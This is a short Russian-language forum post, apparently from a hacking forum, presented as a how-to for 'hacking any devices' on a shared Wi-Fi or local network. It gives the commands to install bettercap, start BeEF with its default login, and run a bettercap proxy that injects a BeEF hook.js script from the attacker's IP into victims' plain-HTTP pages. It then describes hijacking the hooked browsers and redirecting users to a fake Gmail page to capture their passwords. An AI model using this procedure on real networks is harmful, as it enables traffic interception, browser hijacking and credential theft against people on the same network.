Вся информация представлена в ознакомительных целях!
Всем привет! Сегодня расскажу как можно похакать любые устройства в вашей сетке, и сделать это массово.
Итак нам понадобится :
- Kali Linux
- beef-xss framework
- bettercap
Установим bettercap на Kali Linux:
Код:
apt install build-essential ruby-dev libpcap-dev net-tools
gem install bettercapBeef в Kali уже установлен. Запускаем beef. Логин beef, пароль beef.
Код:
service beef-xss startЕсли проблемы с авторизацией, запускаем из папки:
Код:
cd /usr/share/beef ./beefПодключаемся к любой вай-фай сети. Работает и в локалке, но не суть.
Запускаем bettercap:
Код:
bettercap --proxy --proxy-module injects --js-url "http://192.168.57.128:3000/hook.js"Указываем ваш ip. Почему не локалхост думаю понятно. Тут происходит инжект скрипта beef'а. Снифаем траффик, подстраиваемся под запрос, встраиваем скрипт и отправляем обратно тому кто сделал запрос.
Работает, если человек зашел на страницу без ssl, т.е по протоколу http. Как только он закроет страницу, связь с ним пропадает.
Все браузеры-зомби которые подцепил beef отобразятся в меню слева. Пока они онлайн, можно использовать различные модули и экплоиты на них. Beef содержит множество модулей. Вам остается только подобрать нужные для ваших векторов атак. Все зависит от браузера и то в каких контекстах безопасности он находится. Каждый контекст может обеспечивать набор уникальных векторов атак.
Например, можно направить пользователя на фейк gmail. Выбираем нужный модуль, жмем execute.
У пользователя-зомби произойдет редирект на фейк. Если он введет свой логин и пароль, то они отобразятся у нас в панели.
На этом все. Спасибо за внимание.
Последнее редактирование:
